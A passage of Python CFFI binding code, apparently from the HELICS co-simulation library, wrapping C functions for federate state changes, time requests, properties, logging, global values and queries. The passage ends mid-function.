raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateRegisterInterfaces(fed: HelicsFederate, file: str):
"""
Load interfaces from a file.
**Parameters**
- **`fed`** - The federate to which to load interfaces.
- **`file`** - The name of a file to load the interfaces from either JSON, or TOML.
"""
f = loadSym("helicsFederateRegisterInterfaces")
err = helicsErrorInitialize()
f(fed.handle, cstring(file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateGlobalError(fed: HelicsFederate, error_code: int, error_string: str):
"""
Generate a global error from a federate.
A global error halts the co-simulation completely.
**Parameters**
- **`fed`** - The federate to create an error in.
- **`error_code`** - The integer code for the error.
- **`error_string`** - A string describing the error.
"""
f = loadSym("helicsFederateGlobalError")
if HELICS_VERSION == 2:
f(fed.handle, error_code, cstring(error_string))
else:
err = helicsErrorInitialize()
f(fed.handle, error_code, cstring(error_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerGlobalError(broker: HelicsBroker, error_code: int, error_string: str):
f = loadSym("helicsBrokerGlobalError")
err = helicsErrorInitialize()
f(broker.handle, error_code, error_string, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreGlobalError(core: HelicsCore, error_code: int, error_string: str):
f = loadSym("helicsCoreGlobalError")
err = helicsErrorInitialize()
f(core.handle, error_code, error_string, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLocalError(fed: HelicsFederate, error_code: int, error_string: str):
"""
Generate a local error in a federate.
This will propagate through the co-simulation but not necessarily halt the co-simulation, it has a similar effect to finalize but does allow some interaction with a core for a brief time.
**Parameters**
- **`fed`** - The federate to create an error in.
- **`error_code`** - The integer code for the error.
- **`error_string`** - A string describing the error.
"""
f = loadSym("helicsFederateLocalError")
if HELICS_VERSION == 2:
f(fed.handle, error_code, cstring(error_string))
else:
err = helicsErrorInitialize()
f(fed.handle, error_code, cstring(error_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateFinalize(fed: HelicsFederate):
"""
Finalize the federate. This function halts all communication in the federate and disconnects it from the core.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateDisconnect` instead.")
helicsFederateDisconnect(fed)
def helicsFederateFinalizeAsync(fed: HelicsFederate):
"""
Finalize the federate in an async call.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateDisconnectAsync` instead.")
helicsFederateDisconnectAsync(fed)
def helicsFederateFinalizeComplete(fed: HelicsFederate):
"""
Complete the asynchronous disconnect call.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateDisconnectComplete` instead.")
helicsFederateDisconnectComplete(fed)
def helicsFederateDisconnect(fed: HelicsFederate):
"""
Disconnect the federate. This function halts all communication in the federate and disconnects it from the core.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateFinalize")
else:
f = loadSym("helicsFederateDisconnect")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateDisconnectAsync(fed: HelicsFederate):
"""
Disconnect the federate in an async call.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateFinalizeAsync")
else:
f = loadSym("helicsFederateDisconnectAsync")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateDisconnectComplete(fed: HelicsFederate):
"""
Complete the asynchronous disconnect call.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateFinalizeComplete")
else:
f = loadSym("helicsFederateDisconnectComplete")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateFree(fed: HelicsFederate):
"""
Release the memory associated with a federate.
"""
f = loadSym("helicsFederateFree")
f(fed.handle)
def helicsCloseLibrary():
"""
Call when done using the helics library.
This function will ensure the threads are closed properly. If possible this should be the last call before exiting.
"""
f = loadSym("helicsCloseLibrary")
f()
def helicsFederateEnterInitializingMode(fed: HelicsFederate):
"""
Initialization, execution, and time requests.
Enter the initialization state of a federate.
The initialization state allows initial values to be set and received if the iteration is requested on entry to the execution state. This is a blocking call and will block until the core allows it to proceed.
**Parameters**
- **`fed`** - The federate to operate on.
"""
f = loadSym("helicsFederateEnterInitializingMode")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterInitializingModeAsync(fed: HelicsFederate):
"""
Non blocking alternative to `helics.helicsFederateEnterInitializingMode`.
The function helicsFederateEnterInitializationModeFinalize must be called to finish the operation.
**Parameters**
- **`fed`** - The federate to operate on.
"""
f = loadSym("helicsFederateEnterInitializingModeAsync")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateIsAsyncOperationCompleted(fed: HelicsFederate) -> bool:
"""
Check if the current Asynchronous operation has completed.
**Parameters**
- **`fed`** - The federate to operate on.
**Returns**: `True` if current operation has completed, else `False`.
"""
f = loadSym("helicsFederateIsAsyncOperationCompleted")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsFederateEnterInitializingModeComplete(fed: HelicsFederate):
"""
Finalize the entry to initialize mode that was initiated with `helics.helicsEnterInitializingModeAsync`.
**Parameters**
- **`fed`** - The federate desiring to complete the initialization step.
"""
f = loadSym("helicsFederateEnterInitializingModeComplete")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingMode(fed: HelicsFederate):
"""
Request that the federate enter the Execution mode.
This call is blocking until granted entry by the `helics.HelicsCore`. On return from this call the federate will be at time 0. For an asynchronous alternative call see `helics.helicsFederateEnterExecutingModeAsync`
**Parameters**
- **`fed`** - A federate to change modes.
"""
f = loadSym("helicsFederateEnterExecutingMode")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeAsync(fed: HelicsFederate):
"""
Request that the federate enter the Execution mode.
This call is non-blocking and will return immediately. Call `helics.helicsFederateEnterExecutingModeComplete` to finish the call sequence
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to complete the call.
"""
f = loadSym("helicsFederateEnterExecutingModeAsync")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeComplete(fed: HelicsFederate):
"""
Complete the call to `helics.helicsFederateEnterExecutingModeAsync`.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to complete the call.
"""
f = loadSym("helicsFederateEnterExecutingModeComplete")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeIterative(fed: HelicsFederate, iterate: HelicsIterationRequest) -> HelicsIterationResult:
"""
Request an iterative time.
This call allows for finer grain control of the iterative process than `helics.helicsFederateRequestTime`. It takes a time and iteration request, and returns a time and iteration status.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
**Returns**: `helics.HelicsIterationResult`.
"""
f = loadSym("helicsFederateEnterExecutingModeIterative")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsIterationRequest(iterate), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsIterationResult(result)
def helicsFederateEnterExecutingModeIterativeAsync(fed: HelicsFederate, iterate: HelicsIterationRequest):
"""
Request an iterative entry to the execution mode.
This call allows for finer grain control of the iterative process than `helics.helicsFederateRequestTime`. It takes a time and iteration request, and returns a time and iteration status.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
"""
f = loadSym("helicsFederateEnterExecutingModeIterativeAsync")
err = helicsErrorInitialize()
f(fed.handle, HelicsIterationRequest(iterate), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeIterativeComplete(
fed: HelicsFederate,
) -> HelicsIterationResult:
"""
Complete the asynchronous iterative call into ExecutionMode.
**Parameters**
- **`fed`** - The federate to make the request of.
**Returns**: `helics.HelicsIterationResult`.
"""
f = loadSym("helicsFederateEnterExecutingModeIterativeComplete")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsIterationResult(result)
def helicsFederateGetState(fed: HelicsFederate) -> HelicsFederateState:
"""
Get the current state of a federate.
**Parameters**
- **`fed`** - The federate to query.
**Returns**: `helics.HelicsFederateState`.
"""
f = loadSym("helicsFederateGetState")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederateState(result)
def helicsFederateGetCoreObject(fed: HelicsFederate) -> HelicsCore:
"""
Get the `helics.HelicsCore` associated with a federate.
**Parameters**
- **`fed`** - `helics.HelicsFederate`.
**Returns**: `helics.HelicsCore`.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateGetCore` instead.")
return helicsFederateGetCore(fed)
def helicsFederateGetCore(fed: HelicsFederate) -> HelicsCore:
"""
Get the `helics.HelicsCore` associated with a federate.
**Parameters**
- **`fed`** - `helics.HelicsFederate`.
**Returns**: `helics.HelicsCore`.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateGetCoreObject")
else:
f = loadSym("helicsFederateGetCore")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsFederateRequestTime(fed: HelicsFederate, request_time: HelicsTime) -> HelicsTime:
"""
Request the next time for federate execution.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next requested time.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateRequestTime")
err = helicsErrorInitialize()
result = f(fed.handle, request_time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateRequestTimeAdvance(fed: HelicsFederate, time_delta: HelicsTime) -> HelicsTime:
"""
Request the next time for federate execution.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`time_delta`** - The requested amount of time to advance.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateRequestTimeAdvance")
err = helicsErrorInitialize()
result = f(fed.handle, time_delta, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateRequestNextStep(fed: HelicsFederate) -> HelicsTime:
"""
Request the next time step for federate execution.
Feds should have setup the period or `minDelta` for this to work well but it will request the next time step which is the current time plus the minimum time step.
**Parameters**
- **`fed`** - The federate to make the request of.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateRequestNextStep")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateRequestTimeIterative(
fed: HelicsFederate, request_time: HelicsTime, iterate: HelicsIterationRequest
) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Request an iterative time.
This call allows for finer grain control of the iterative process than `helics.helicsFederateRequestTime`. It takes a time and iteration request, and returns a time and iteration status.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next desired time.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
**Returns**: `(helics.HelicsTime, helics.HelicsIterationResult)`.
"""
f = loadSym("helicsFederateRequestTimeIterative")
err = helicsErrorInitialize()
if HELICS_VERSION == 2:
out_iterate = ffi.new("helics_iteration_result *")
else:
out_iterate = ffi.new("HelicsIterationResult *")
result = f(fed.handle, request_time, HelicsIterationRequest(iterate), out_iterate, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result, HelicsIterationResult(out_iterate[0])
def helicsFederateRequestTimeAsync(fed: HelicsFederate, request_time: HelicsTime):
"""
Request the next time for federate execution in an asynchronous call.
Call `helics.helicsFederateRequestTimeComplete` to finish the call.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next requested time.
"""
f = loadSym("helicsFederateRequestTimeAsync")
err = helicsErrorInitialize()
f(fed.handle, request_time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateRequestTimeComplete(fed: HelicsFederate) -> HelicsTime:
"""
Complete an asynchronous requestTime call.
**Parameters**
- **`fed`** - The federate to make the request of.
"""
f = loadSym("helicsFederateRequestTimeComplete")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateRequestTimeIterativeAsync(fed: HelicsFederate, request_time: HelicsTime, iterate: HelicsIterationRequest):
"""
Request an iterative time through an asynchronous call.
This call allows for finer grain control of the iterative process than `helics.helicsFederateRequestTime`. It takes a time and iteration request, and returns a time and iteration status. Call `helics.helicsFederateRequestTimeIterativeComplete` to finish the process.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next desired time.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
"""
f = loadSym("helicsFederateRequestTimeIterativeAsync")
err = helicsErrorInitialize()
f(fed.handle, request_time, HelicsIterationRequest(iterate), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateRequestTimeIterativeComplete(fed: HelicsFederate) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Complete an iterative time request asynchronous call.
**Parameters**
- **`fed`** - The federate to make the request of.
**Returns**: The iteration specification of the result.
"""
f = loadSym("helicsFederateRequestTimeIterativeComplete")
err = helicsErrorInitialize()
if HELICS_VERSION == 2:
out_iterate = ffi.new("helics_iteration_result *")
else:
out_iterate = ffi.new("HelicsIterationResult *")
result = f(fed.handle, out_iterate, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result, out_iterate
def helicsFederateGetName(fed: HelicsFederate) -> str:
"""
Get the name of the federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to query.
**Returns**: A string with the name.
"""
f = loadSym("helicsFederateGetName")
result = f(fed.handle)
return ffi.string(result).decode()
def helicsFederateSetTimeProperty(fed: HelicsFederate, time_property: int, time: HelicsTime):
"""
Set a time based property for a federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to set the property for.
- **`time_property`** - A integer code for a time property.
- **`time`** - The requested value of the property.
"""
f = loadSym("helicsFederateSetTimeProperty")
err = helicsErrorInitialize()
f(fed.handle, time_property, time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetFlagOption(fed: HelicsFederate, flag: Union[int, HelicsFederateFlag, HelicsFlag], value: bool):
"""
Set a flag for the federate.
**Parameters**
- **`fed`** - The federate to alter a flag for.
- **`flag`** - The flag to change.
- **`value`** - The new value of the flag. 0 for false, !=0 for true.
"""
f = loadSym("helicsFederateSetFlagOption")
err = helicsErrorInitialize()
f(fed.handle, flag, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetSeparator(fed: HelicsFederate, separator: str):
"""
Set the separator character in a federate.
The separator character is the separation character for local publications/endpoints in creating their global name.
For example if the separator character is '/' then a local endpoint would have a globally reachable name of fedName/localName.
**Parameters**
- **`fed`** - The federate info object to alter.
- **`separator`** - The character to use as a separator.
"""
f = loadSym("helicsFederateSetSeparator")
err = helicsErrorInitialize()
f(fed.handle, cchar(separator), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetIntegerProperty(fed: HelicsFederate, property: HelicsProperty, value: int):
"""
Set an integer based property of a federate.
**Parameters**
- **`fed`** - The federate to change the property for.
- **`property`** - `helics.HelicsProperty`.
- **`value`** - The value of the property.
"""
f = loadSym("helicsFederateSetIntegerProperty")
err = helicsErrorInitialize()
f(fed.handle, HelicsProperty(property), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateGetTimeProperty(fed: HelicsFederate, time_property: int) -> HelicsTime:
"""
Get the current value of a time based property in a federate.
**Parameters**
- **`fed`** - The federate query.
- **`time_property`** - The property to query.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateGetTimeProperty")
err = helicsErrorInitialize()
result = f(fed.handle, time_property, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateGetFlagOption(fed: HelicsFederate, flag: Union[int, HelicsFederateFlag, HelicsFlag]) -> bool:
"""
Get a flag value for a federate.
**Parameters**
- **`fed`** - The federate to get the flag for.
- **`flag`** - The `helics.HelicsFederateFlag` to query.
"""
f = loadSym("helicsFederateGetFlagOption")
err = helicsErrorInitialize()
try:
flag = HelicsFlag(flag)
except Exception as _:
flag = HelicsFederateFlag(flag)
result = f(fed.handle, flag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsFederateGetIntegerProperty(fed: HelicsFederate, property: HelicsProperty) -> int:
"""
Get the current value of an integer property (such as a logging level).
**Parameters**
- **`fed`** - The federate to get the flag for.
- **`property`** - A code for the property to set `helics.HelicsProperty`.
"""
f = loadSym("helicsFederateGetIntegerProperty")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsProperty(property), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateGetCurrentTime(fed: HelicsFederate) -> HelicsTime:
"""
Get the current time of the federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to query.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateGetCurrentTime")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateSetGlobal(fed: HelicsFederate, name: str, value: str):
"""
Set a federation global value through a federate.
This overwrites any previous value for this name.
**Parameters**
- **`fed`** - The federate to set the global through.
- **`name`** - The name of the global to set.
- **`value`** - The value of the global.
"""
f = loadSym("helicsFederateSetGlobal")
err = helicsErrorInitialize()
f(fed.handle, cstring(name), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateAddDependency(fed: HelicsFederate, name: str):
"""
Add a time dependency for a federate. The federate will depend on the given named federate for time synchronization.
**Parameters**
- **`fed`** - The federate to add the dependency for.
- **`name`** - The name of the federate to depend on.
"""
f = loadSym("helicsFederateAddDependency")
err = helicsErrorInitialize()
f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetLogFile(fed: HelicsFederate, log_file: str):
"""
Set the logging file for a federate (actually on the core associated with a federate).
**Parameters**
- **`fed`** - The federate to set the log file for.
- **`log_file`** - The name of the log file.
"""
f = loadSym("helicsFederateSetLogFile")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogErrorMessage(fed: HelicsFederate, log_message: str):
"""
Log an error message through a federate.
**Parameters**
- **`fed`** - The federate to log the error message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogErrorMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogWarningMessage(fed: HelicsFederate, log_message: str):
"""
Log a warning message through a federate.
**Parameters**
- **`fed`** - The federate to log the warning message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogWarningMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogInfoMessage(fed: HelicsFederate, log_message: str):
"""
Log an info message through a federate.
**Parameters**
- **`fed`** - The federate to log the info message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogInfoMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogDebugMessage(fed: HelicsFederate, log_message: str):
"""
Log a debug message through a federate.
**Parameters**
- **`fed`** - The federate to log the debug message through.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogDebugMessage")
err = helicsErrorInitialize()
f(fed.handle, cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLogLevelMessage(fed: HelicsFederate, log_level: HelicsLogLevel, log_message: str):
"""
Log a message through a federate.
**Parameters**
- **`fed`** - The federate to log the message through.
- **`log_level`** - The level of the message to log see `helics.HelicsLogLevel`.
- **`log_message`** - The message to put in the log.
"""
f = loadSym("helicsFederateLogLevelMessage")
err = helicsErrorInitialize()
f(fed.handle, HelicsLogLevel(log_level), cstring(log_message), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreSetGlobal(core: HelicsCore, name: str, value: str):
"""
Set a global value in a core.
This overwrites any previous value for this name.
**Parameters**
- **`core`** - The core to set the global through.
- **`name`** - The name of the global to set.
- **`value`** - The value of the global.
"""
f = loadSym("helicsCoreSetGlobal")
err = helicsErrorInitialize()
f(core.handle, cstring(name), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerSetGlobal(broker: HelicsBroker, name: str, value: str):
"""
Set a federation global value.
This overwrites any previous value for this name.
**Parameters**
- **`broker`** - The broker to set the global through.
- **`name`** - The name of the global to set.
- **`value`** - The value of the global.
"""
f = loadSym("helicsBrokerSetGlobal")
err = helicsErrorInitialize()
f(broker.handle, cstring(name), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreSetLogFile(core: HelicsCore, log_file: str):
"""
Set the log file on a core.
**Parameters**
- **`core`** - The core to set the log file for.
- **`log_file`** - The name of the file to log to.
"""
f = loadSym("helicsCoreSetLogFile")
err = helicsErrorInitialize()
f(core.handle, cstring(log_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerSetLogFile(broker: HelicsBroker, log_file: str):
"""
Set the log file on a broker.
**Parameters**
- **`broker`** - The broker to set the log file for.
- **`log_file`** - The name of the file to log to.
"""
f = loadSym("helicsBrokerSetLogFile")
err = helicsErrorInitialize()
f(broker.handle, cstring(log_file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCreateQuery(target_name: str, query_string: str) -> HelicsQuery:
"""
Create a query object.
A query object consists of a target and query string.
**Parameters**
- **`target_name`** - The name of the target to query.
- **`query_string`** - The query to make of the target.
**Returns**: `helics.HelicsQuery`.
"""
f = loadSym("helicsCreateQuery")
result = f(cstring(target_name), cstring(query_string))
return HelicsQuery(result)
def helicsQueryExecute(query: HelicsQuery, fed: HelicsFederate) -> JSONType:
"""
Execute a query.
The call will block until the query finishes which may require communication or other delays.
**Parameters**
- **`query`** - The query object to use in the query.
- **`fed`** - A federate to send the query through.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryExecute")
err = helicsErrorInitialize()
result = f(query.handle, fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
def helicsQueryCoreExecute(query: HelicsQuery, core: HelicsCore) -> JSONType:
"""
Execute a query directly on a core.
The call will block until the query finishes which may require communication or other delays.
**Parameters**
- **`query`** - The query object to use in the query.
- **`core`** - The core to send the query to.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryCoreExecute")
err = helicsErrorInitialize()
result = f(query.handle, core.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
def helicsQueryBrokerExecute(query: HelicsQuery, broker: HelicsBroker) -> JSONType:
"""
Execute a query directly on a broker.
The call will block until the query finishes which may require communication or other delays.
**Parameters**
- **`query`** - The query object to use in the query.
- **`broker`** - The broker to send the query to.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryBrokerExecute")
err = helicsErrorInitialize()
result = f(query.handle, broker.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
def helicsQueryExecuteAsync(query: HelicsQuery, fed: HelicsFederate):
"""
Execute a query in a non-blocking call.
**Parameters**
- **`query`** - The query object to use in the query.
- **`fed`** - A federate to send the query through.
"""
f = loadSym("helicsQueryExecuteAsync")
err = helicsErrorInitialize()
f(query.handle, fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQueryExecuteComplete(query: HelicsQuery) -> JSONType:
"""
Complete the return from a query called with `helics.helicsExecuteQueryAsync`.
The function will block until the query completes `isQueryComplete` can be called to determine if a query has completed or not.
**Parameters**
- **`query`** - The query object to complete execution of.
**Returns**: String that contains the result of the query that was executed.
"""
f = loadSym("helicsQueryExecuteComplete")
err = helicsErrorInitialize()
result = f(query.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
s = ffi.string(result).decode()
try:
return json.loads(s)
except json.JSONDecodeError:
warnings.warn("This function will return a JSON object in the next major release")
return s
def helicsQueryIsCompleted(query: HelicsQuery) -> bool:
"""
Check if an asynchronously executed query has completed.
This function should usually be called after a QueryExecuteAsync function has been called.
**Parameters**
- **`query`** - The query object to check if completed
**Returns**: Will return `True` if an asynchronous query has completed or a regular query call was made with a result, and false if an asynchronous query has not completed or is invalid.
"""
f = loadSym("helicsQueryIsCompleted")
result = f(query.handle)
return result == 1
def helicsQuerySetTarget(query: HelicsQuery, target_name: str):
"""
Update the target of a query.
**Parameters**
- **`query`** - The query object to change the target of.
- **`target_name`** - the name of the target to query.
"""
f = loadSym("helicsQuerySetTarget")
err = helicsErrorInitialize()
f(query.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQuerySetQueryString(query: HelicsQuery, query_string: str):
"""
Update the queryString of a query.
**Parameters**
- **`query`** - The query object to change the target of.
- **`query_string`** - the new queryString.
"""
f = loadSym("helicsQuerySetQueryString")
err = helicsErrorInitialize()
f(query.handle, cstring(query_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQueryFree(query: HelicsQuery):
"""
Free the memory associated with a query object.
"""
f = loadSym("helicsQueryFree")
f(query.handle)
def helicsCleanupLibrary():
"""
Function to do some housekeeping work.
This runs some cleanup routines and tries to close out any residual thread that haven't been shutdown yet.
"""
f = loadSym("helicsCleanupLibrary")
f()
def helicsFederateRegisterEndpoint(fed: HelicsFederate, name: str, type: str) -> HelicsEndpoint:
"""
MessageFederate Calls.
Create an endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for endpoints.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint must have been created with helicsCreateMessageFederate or helicsCreateCombinationFederate.
- **`name`** - The identifier for the endpoint. This will be prepended with the federate name for the global identifier.
- **`type`** - A string describing the expected type of the publication (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateRegisterEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
